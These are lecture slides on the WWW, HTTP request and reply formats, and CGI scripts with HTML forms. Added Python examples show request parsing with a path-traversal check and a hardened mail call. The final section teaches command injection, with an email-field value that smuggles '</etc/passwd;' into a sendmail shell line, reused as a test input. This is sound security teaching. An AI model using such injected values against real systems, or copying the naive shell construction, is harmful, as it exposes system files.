WWW: an Internet application
Bill Chu
© Bei-Tseng Chu Aug 2000
WWW Web and HTTP
- The WWW is a web of interconnected information servers
  - each server maintains a collection of documents
  - a client can request a document from any info server
  - one document can refer to another document in any information server via a hyperlink
- HTTP is the application protocol that defines the WWW server-client interactions
  - HTTP server maintains the HTTP documents
  - HTTP client obtains and displays the HTTP docs
The client and server architecture
- A client connects to a server to send and receive information
- A server is typically a “large” computer that is capable of handling multiple client requests at the same time.
- The WWW is the universal client server architecture.
Benefits of the Client Server architecture
- Effective model for information sharing
  - Server makes information available for multiple clients
  - Clients are sure to receive the most up to date information
- Server technology can be changed (e.g. a database change) without affecting clients
- Clients can be dispersed geographically
- Server maintenance is easier since all clients are connecting to one place.
Protocol
- A protocol is a series of steps, involving two or more parties, designed to accomplish a task
- Everyone involved in the protocol must know the protocol and all of the steps to follow in advance
- Everyone in the protocol must agree to follow it
- The protocol must be unambiguous; each step must be well defined and there must be no chance of a misunderstanding.
- The protocol must be complete; there must be a specified action for every possible situation.
HyperText Transfer Protocol (HTTP)
- Address: IP address + TCP port 80
- Format:
  - HTTP request format
        Request request-URL HTTP-version
        0 or more headers
        <blank line>
        Body if it is a POST request
  - HTTP reply format
        HTTP-version response-code response-phrase
        0 or more headers
        <blank line>
        body (HTTP document)
- Rules:
  - client sends an HTTP request to server
  - server sends back an HTTP reply
Example
Step one: wait for a new request
- The httpd program waits for a request to arrive from some client somewhere on the Internet.
- The server program listens on a port (default 80) and is dormant in this state.
Step two: A request arrives from a client
- A user might have typed in a URL at a browser: http://www.anywhere.com/sample.html
- The browser will request a connection with the server at www.anywhere.com
- The browser issues
      GET /sample.html http/1.0
      User-agent: Mosaic for X Windows/2.4
      Accept: text/plain
      Accept: text/html
      Accept: images/*
Step three: The server parses the request
- The server decodes the message according to the http protocol and determines what it should do:
      Method: GET
      Document: /sample.html
      Protocol: http, Version 1.0
      User agent: Mosaic for X Windows/2.4
      Accept: text/plain, text/html, images/*
Step four: Do the method requested
- The httpd program fulfills the request. To GET a document, the server looks up the file (/sample.html) in its document tree
- Success: document sent
      HTTP/1.0 200 Document follows
      Server: NCSAV1.4
      Date: Thu, 20 Jul 2000 22:00:00 GMT
      Content-type: text/html
      Content-length: 1066
      Last-modified: Thu, 20 Jul 2000 20:38:00 GMT
- Failure: an error is sent
      HTTP/1.0 403 Not Found
      Server: NCSA/1.4
      Date: Thu, 20 Jul 2000 22:00:00 GMT
      Content-type: text/html
      Content-length: 0
Step five: Finish up: close file; close network connection
- When the file is completely sent or an error message is sent, the httpd server is finished with its work. It closes the file and closes the network connection.
- The client receives the data and formats it according to http tags.
- The server is now ready for more requests and it goes to step 1.
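
Steps three and four above, as an added example that is not part of the original slides: the request from step two is parsed into the fields the server extracts, and the requested document is mapped into the document tree so that a path climbing out of the tree is refused. The function names, the temporary document tree and the 400/403/404 status choices are assumptions of this example.

```python
import os
import tempfile
from urllib.parse import unquote

# Constructed from the request shown in step two (CRLF line endings added).
SAMPLE = (b"GET /sample.html http/1.0\r\nUser-agent: Mosaic for X Windows/2.4\r\n"
          b"Accept: text/plain\r\nAccept: text/html\r\nAccept: images/*\r\n\r\n")

def parse_request(raw):
    """Step three: split a request into method, document, version, headers."""
    lines = raw.partition(b"\r\n\r\n")[0].decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].lower().startswith("http/"):
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep or not name or name != name.strip():
            raise ValueError("malformed header line")
        # Repeated headers (the three Accept lines) merge into one value.
        headers.setdefault(name.lower(), []).append(value.strip())
    return {"method": parts[0], "document": parts[1], "version": parts[2][5:],
            "headers": {k: ",".join(v) for k, v in headers.items()}}

def resolve(docroot, document):
    """Step four: map the document into the tree; None if it escapes it."""
    rel = unquote(document.split("?", 1)[0])
    if not rel.startswith("/") or "\x00" in rel:
        return None
    root = os.path.realpath(docroot)
    path = os.path.realpath(os.path.join(root, rel.lstrip("/")))
    return path if os.path.commonpath([root, path]) == root else None

def status_for(raw, docroot):
    """Status line the server would send for this request."""
    try:
        path = resolve(docroot, parse_request(raw)["document"])
    except ValueError:
        return "HTTP/1.0 400 Bad Request"
    if path is None:
        return "HTTP/1.0 403 Forbidden"
    found = os.path.isfile(path)
    return "HTTP/1.0 200 Document follows" if found else "HTTP/1.0 404 Not Found"

def demo():
    with tempfile.TemporaryDirectory() as root:
        open(os.path.join(root, "sample.html"), "w").close()
        others = (b"GET /../outside.txt http/1.0\r\n\r\n", b"GET /missing.html http/1.0\r\n\r\n")
        return [status_for(r, root) for r in (SAMPLE, *others)]
```

The path is percent-decoded and resolved before the containment check, so an encoded ".." is treated the same as a literal one.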
Web scripts and CGI
- A web script is a program that can be executed by the web server in response to web requests.
- Any program can be a web script; there is no mandatory language
- Common Gateway Interface (CGI) is a standard for how scripts can be called (by httpd) and how data is passed between the httpd server and the script
Example
Step one: wait for a new request
- The httpd program waits for a request to arrive from some client somewhere on the Internet.
- The server program listens on a port and is dormant in this state.
Step two: A request arrives from a client
- A user might have typed in a URL at a browser: http://www.anywhere.com/scripts/how_busy_are_you
- The browser will request a connection with the server at www.anywhere.com
- The browser issues
      GET /scripts/how_busy_are_you http/1.0
      User-agent: Mosaic for X Windows/2.4
      Accept: text/plain
      Accept: text/html
      Accept: images/*
Step three: Do the method requested
- The httpd program fulfills the request by executing the script. The server knows it is a script because it is a file under the directory “script”. The name of the “script” directory is set at web server configuration time.
- To GET the script, the server looks up the file (/scripts/how_busy_are_you) in its document tree
- Success: the output of the script (normally directed to the screen) is sent to the browser
      HTTP/1.0 200 Document follows
      Server: NCSAV1.4
      Date: Thu, 20 Jul 2000 22:00:00 GMT
      Content-type: text/plain

      11:35am up 7 days, 4:35, 5 users, load average: 0.00, 0.09, 0.00
- Failure: an error is sent
      HTTP/1.0 200 Document follows
      Server: NCSAV1.4
      Date: Thu, 20 Jul 2000 22:00:00 GMT
      Content-type: text/plain

      Cannot find uptime command on this system
Step four: Finish up: close file; close network connection
- When the file is completely sent or an error message is sent, the httpd server is finished with its work. It closes the file and closes the network connection.
- The client receives the data and formats it according to http tags.
- The server is now ready for more requests and it goes to step 1.
Scripts and forms
    <TITLE> Form for CSO PH Query </TITLE>
    <H1> Form for CSO PH Query </H1>
    This form will send a PH query to the specified ph server
    <p>
    <hr>
    <form ACTION="http://www.server.org:80/scripts/directory_assistance">
    PH server: <INPUT TYPE="text" Name="Jserver" VALUE="ns.anywhere.com" MAXLENGTH="256">
    <dd><input type="checkbox" NAME="doname" VALUE="yes"> Return name? </dd>
    <dd><input type="checkbox" NAME="dophone" VALUE="yes"> Return phone? </dd>
    <dd><input type="checkbox" NAME="doemail" VALUE="yes"> Return email? </dd>
    <H3> At least one of the following fields must be specified: </h3>
    <ul>
    <li> <input type="text" NAME="Qname" MAXLENGTH="256"> Name
    <li> <input type="text" Name="Qname" MAXLENGTH="256"> Email
    </ul>
    <input type="submit">
    </form>
Passing arguments to web scripts
- When the submit button is clicked the browser sends:
      GET http://www.anywhere.com:80/scripts/directory_assistant?Jserver=ns.anywhere.com&doname=yes&dophone=yes&Qname=&[email protected] http/1.0
HTTP request methods
- GET: retrieve information from the server. It is the most commonly used. It can also be used in conjunction with CGI to pass parameters to the server
- HEAD: it is identical to GET, except that the server does not return a document. It is useful for verifying that a document exists, for checking links, or for checking time of modification
- POST: allows the server to receive data from the client. It is most commonly used to send the data in HTML forms to the server for processing.
Security risks for CGI
- Consider a web-based email form:
      <form ACTION="http://www.coolmail.com/scripts/sendmail.pl">
      <ul>
      <li> email: <input type="text" NAME="email" MAXLENGTH="256">
      <li> message: <input type="text" NAME="message" SIZE=46 MAXLENGTH="2560">
      </ul>
      <hr>
      <input type="submit" VALUE="Send">
      </form>
Security problem
- Suppose the Perl script saves the message into a temp file and executes the unix command:
      sendmail [email protected] <temp
- A malicious user could type in the field for email address:
      [email protected] </etc/passwd;
- This turns into:
      sendmail [email protected]</etc/passwd;<temp
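
The problem above next to a hardened form, as an added example that is not part of the original slides or the script they describe. The address pattern, the function names, the /usr/sbin/sendmail path and the constructed addresses are assumptions of this example; a small stand-in program replaces sendmail so it runs offline.

```python
import re
import subprocess
import sys

# Conservative allow-list for an address: no whitespace, no shell
# metacharacters, and no leading "-" that could be read as an option.
ADDRESS = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")

def naive_command(email):
    """What the slide's script builds: form input pasted into a shell line."""
    return f"sendmail {email} <temp"

def send(email, message, mailer=("/usr/sbin/sendmail", "-i")):
    """Hardened form: validate the address, pass it as one argv element and
    feed the message on stdin. No shell and no temp file are involved."""
    if not ADDRESS.fullmatch(email):
        raise ValueError("rejected address")
    argv = [*mailer, email]
    done = subprocess.run(argv, input=message.encode(),
                          capture_output=True, check=True)
    return argv, done.stdout

# Stand-in for sendmail (assumption, for offline use): prints its recipient
# arguments and the number of message bytes it read from stdin.
STAND_IN = (sys.executable, "-c",
            "import sys; print(sys.argv[1:], len(sys.stdin.buffer.read()))")

def demo():
    hostile = "user@example.com </etc/passwd;"  # constructed, shape from the slide
    results = {"naive": naive_command(hostile)}
    try:
        send(hostile, "hi", STAND_IN)
        results["hostile"] = "sent"
    except ValueError:
        results["hostile"] = "rejected"
    argv, out = send("user@example.com", "hi", STAND_IN)
    results["recipient"] = argv[-1]
    results["stand_in_output"] = out.decode().strip()
    return results

if __name__ == "__main__":
    print(demo())
```

Because the argument list goes straight to the program, characters such as "<" and ";" would stay inside one argument even without the allow-list; the validation is a second layer, not the only one.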